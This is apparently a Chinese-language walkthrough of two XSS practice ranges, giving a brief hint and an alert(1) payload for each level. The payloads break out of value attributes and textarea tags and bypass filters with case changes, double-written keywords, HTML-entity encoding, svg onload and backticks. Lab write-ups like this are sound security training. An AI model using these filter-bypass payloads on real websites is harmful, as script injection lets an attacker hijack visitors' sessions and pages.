xsslabs 靶场关卡

二

先随便试
然后查看源代码

发现输出在value里面 观察后 应该先闭合value双引号
1‘’><"
或者 1” οnclick=“alert（1） 一个点击事件闭合即可

第三关

随便试 然后观察代码
还是输出在value中

现在onclick不行了
查看源代码 有一个函数htmlspecialchars

百度一下 作用是

转译了双引号 就用单引号即可1’ οnclick='alert(1)

第四关

随便输入
发现他把 <> 给我们过滤了

那简单
用 onclick就完事

第五关

带on的标签都不行了 被过滤了

现在 就可以用html超链接标签就不带on
">hhh 就可以了

第六关

试了以后
on script href src 都过滤了
现在 我们可以用大小写绕过

第七关

试了以后发现把on script href 等关键字过滤了
大小写也不行
但是没过滤<>

可以试试双写
hhh"oonnclick="alert(1)

第八关

让我们添加友情链接
输出在href中 过滤了script关键字 大小写 也不行

试试编码
javascript:alert(1)
这里编码后网页又给我自动编码回去了。。。为了显示 加了空格
& #106;& #97;v& #97;& #115;& #99;& #114; i& #112;t& #58;& #97;& #108;& #101;& #114;& #116;& #40;& #49;& #41;

第九关

用第八关的编码 他说连接不合法
那就编码一个合法的
http://www.baidu.com
但是没弹窗

这里也把javascript过滤了 所以可以编码javascript
javascript:alert(1)//http://

胡务器在线靶场

第0关

< script >alert(1)< /script >

第一关

因为在< textarea >标签里 其他标签都会失效
所以先闭合< textarea >就可以了

第二关

1"><svg/οnlοad=alert(1)>

第三关

因为它过滤了（[]）/ 等
所以用反引号``代替（）
< script> alert 1< /script>

第四关

把（1）编码即可
因为在前一关的基础上限制了``
< svg>< script>alert& #40; & #49;& #41;</script

第五关

– -!>< script>alert(1)< /script>